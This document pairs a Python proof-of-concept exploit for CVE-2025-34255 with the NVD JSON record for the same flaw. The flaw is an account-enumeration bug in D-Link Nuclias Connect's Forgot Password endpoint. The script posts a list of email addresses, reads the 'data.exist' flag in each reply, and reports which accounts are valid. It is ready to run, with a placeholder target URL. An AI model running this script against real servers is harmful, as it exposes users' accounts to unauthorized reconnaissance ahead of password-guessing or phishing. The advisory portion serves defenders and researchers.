CVE-2025-34255

#!/usr/bin/env python3 # CVE-2025-34255 - D-Link Nuclias Connect Account Enumeration PoC # Exploits observable response discrepancy in the Forgot Password endpoint import requests import sys import json TARGET_URL = "https://target-nuclias-connect.example.com" FORGOT_PASSWORD_ENDPOINT = "/api/forgot-password" # Adjust path as needed def check_email_exists(session, email): """ Check if an email address is associated with a valid account by analyzing the response from the Forgot Password endpoint. """ url = f"{TARGET_URL}{FORGOT_PASSWORD_ENDPOINT}" payload = {"email": email} headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } try: response = session.post(url, json=payload, headers=headers, timeout=10) data = response.json() # The vulnerability: 'data.exist' differs based on account existence if "data" in data and "exist" in data["data"]: return data["data"]["exist"] return False except Exception as e: print(f"[ERROR] Request failed for {email}: {e}") return None def enumerate_accounts(email_list): """ Enumerate valid accounts from a list of email addresses. """ session = requests.Session() valid_accounts = [] print(f"[*] Starting enumeration against {TARGET_URL}") print(f"[*] Testing {len(email_list)} email addresses...\n") for email in email_list: exists = check_email_exists(session, email) if exists is True: print(f"[+] VALID: {email}") valid_accounts.append(email) elif exists is False: print(f"[-] Invalid: {email}") else: print(f"[?] Error: {email}") print(f"\n[*] Enumeration complete. Found {len(valid_accounts)} valid account(s).") return valid_accounts if __name__ == "__main__": # Example email list - replace with target-specific addresses emails = [ "[email protected]", "[email protected]", "[email protected]", "[email protected]" ] if len(sys.argv) > 1: TARGET_URL = sys.argv[1] enumerate_accounts(emails)

{"cve": {"id": "CVE-2025-34255", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:32.920", "lastModified": "2025-10-30T16:06:51.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Link Nuclias Connect firmware versions <= 1.3.1.4 contain an observable response discrepancy vulnerability. The application's 'Forgot Password' endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server. NOTE: D-Link states that a fix is under development."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.3.1.4", "matchCriteriaId": "1DDE121F-E175-450D-A078-A7BF6F643415"}]}]}], "references": [{"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-forgot-password-account-enumeration", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}